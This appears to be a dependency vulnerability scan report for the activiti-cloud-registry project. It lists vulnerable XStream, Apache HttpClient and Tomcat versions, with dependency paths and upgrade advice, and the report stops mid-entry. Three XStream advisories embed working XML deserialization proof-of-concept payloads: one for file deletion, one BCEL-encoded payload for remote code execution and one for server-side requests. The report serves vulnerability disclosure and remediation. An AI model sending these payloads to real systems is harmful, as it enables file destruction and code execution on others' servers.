  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>
                <part>
                  <dataHead>
                    <tail/>
                    <head>
                      <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>
                        <len>3</len>
                        <data>AQID</data>
                      </data>
                    </head>
                  </dataHead>
                  <contentTransferEncoding>base64</contentTransferEncoding>
                  <msg>
                    <it class='java.util.ArrayList$Itr'>
                      <cursor>0</cursor>
                      <lastRet>1</lastRet>
                      <expectedModCount>4</expectedModCount>
                        <outer-class>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                        </outer-class>
                    </it>
                    <in class='java.io.FileInputStream'>
                      <fd/>
                      <channel class='sun.nio.ch.FileChannelImpl'>
                        <closeLock/>
                        <open>true</open>
                        <threads>
                          <used>-1</used>
                        </threads>
                        <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>
                          <sockClient>
                            <fileName>/etc/hosts</fileName>
                            <unlinkFile>true</unlinkFile>
                          </sockClient>
                          <connectionSync/>
                        </parent>
                      </channel>
                      <closeLock/>
                    </in>
                  </msg>
                </part>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                      <outer-class reference='../..'/>
                    </key>
                  </defaultDomain>
                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='javax.activation.URLDataSource'>
                <url>http://localhost:8080/internal/:</url>
              </dataSource>
            </message>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Improper Input Validation

  • Vulnerable module: org.apache.httpcomponents:httpclient
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3

Overview

org.apache.httpcomponents:httpclient is a HttpClient component of the Apache HttpComponents project.

Affected versions of this package are vulnerable to Improper Input Validation. Apache HttpClient can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

Remediation

Upgrade org.apache.httpcomponents:httpclient to version 4.5.13 or higher.

References

Improper Input Validation vulnerability report

medium severity
new

Improper Authorization

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Authorization in the processing of security constraints when multiple method constraints define an HTTP method for the same extension. An attacker can gain unauthorized access to protected resources by crafting requests that exploit the improper application of these constraints.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Improper Authorization vulnerability report

medium severity
new

Improper Handling of Case Sensitivity

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
